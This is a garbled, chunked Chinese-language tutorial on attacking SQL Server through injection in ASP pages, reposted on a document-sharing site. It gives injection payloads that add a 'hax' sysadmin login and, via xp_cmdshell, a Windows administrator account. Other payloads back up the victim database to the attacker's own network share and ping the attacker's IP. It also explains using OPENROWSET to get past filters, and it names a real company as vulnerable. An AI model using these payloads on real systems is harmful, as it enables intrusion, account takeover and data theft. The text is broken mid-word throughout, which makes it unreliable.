sqlserver安全专题sqlserver数据库的一些攻击

《sqlserver安全专题sqlserver数据库的一些攻击》由会员上传分享，免费在线阅读，更多相关内容在学术论文-天天文库。

1、SQLServer安全专题SQLServer数据库的一些攻击>>教育资源库　　编者：如何保障aster.dbo.sp_addloginhax;--　　neaster.dbo.sp_passaster.dbo.sp_addsrvrolemembersysadminhax;--　　neaster.dbo.xp_cmdshell'userhaxhax/es:all/passaster.dbo.xp_cmdshell'localgroupadministratorshax/add';--　　这样，你在他的数据库和系统内都留下了hax管理员账号了　　当

2、然，前提条件是ASP用管理员账号，所以虚拟空间大家就别试了，不会存在这个漏洞的。　　以后我们会讨论，如果对方的ASP不是用SQL管理员账号，我们如何入侵，当然也会涉及到1433端口的入侵　　当然大家可以试试看在id=2后面加上一个'符号，主要看对方的ASP怎么写了　　再说说当ASP程序使用的SQL账号不是管理员的时候我们该如何做。　　假设有如下页面　　nee()函数吧　　打开你的queryanalyzer，看看printdb_name()，呵呵，当前的数据库名就出来了　　以次类推，如下：declareasysname;seta=db_name();backu

3、pdatabaseatodisk='你的IP你的共享目录bak.dat',name='test';--　　呵呵，他的当前数据库就备份到你的硬盘上了，接下来要做的大家心里都明白了吧　　同理这个方法可以找到对方的SQL的IP　　先装一个防火墙，打开ICMP和139TCP和445TCP的警告提示　　然后试试看neaster.dbo.xp_cmdshell'ping你的IP'　　如果防火墙提示有人ping你，那么因该可以肯定对方的ASP用的是SQL的管理员权限，同时也确定了对方的SQLServer的准确位置，因为很多大一点的网

4、站考虑性能，会把dshell了，该怎么办？　　别着急，试试看这个nee();backupdatabaseatodisk='你的IP你的共享目录bak.dat',name='test';--123下一页>>>>这篇文章来自..，。呵呵，你的防火墙该发出警告了，有人连接你的445或139(dshell这些关键字了　　所有以上url希望大家通过vbscript提交，因为浏览器的地址栏会屏蔽一些特殊字符，这样你的命令就不能完整传输了　　dshell调用限制很大，其实这里面还有很多值得深入的地方比如　　.guosen..。国信证卷就有这个问题，

5、而且他们采用ms的三层结构作的用以前说的xp_cmdshell做法就不行了，字符串会被过滤，但是　　我尝试了，用sql的异类请求仍然可以在对方的机器上开启tel服务和administrators组的账号！由于对方防火墙很严checkpoint数据报进出　　都只开放80端口，因此，要想获得他的数据库结构比较困难了，但是还是有办法可以做到的：P　　顺便提醒大家注意一下关于sqloledb,db_name,openroopenroyserver';'sa';'','select*fromtable')　　可见（即使从

6、字面意义上看)openrodshell呢？答案是肯定的！　　select*fromopenrotonlyoffexecmaster.dbo.xp_cmdshell''dirc:''')　　必须加上setfmtonlyoff用来屏蔽默认的只返回列信息的设置，这样xp_cmdshell返回的output集合就会提交给前面的select显示，如果采用默认设置，会返回空集合导致select出错，命令也就无法执行了。　　那么如果我们要调用sp_addlogin呢，他不会像xp_cmdshell返回任何集合的，我们就不能再依靠fmtonl

7、y设置了，可以如下操作　　select*fromopenroaster.dbo.sp_addloginHectic')　　这样，命令至少会返回select'OK!'的集合，你的机器商会显示OK!，同时对方的数据库内也会增加一个Hectic的账号，也就是说，我们利用　　select'OK!'的返回集合欺骗了本地的select请求，是命令能够正常执行，通理sp_addsrvrolemember和opendatasource也可以如此操作！至于　　这个方法真正的用处，大家慢慢想吧：P　　2。关于msdasql两次请求的问题　　不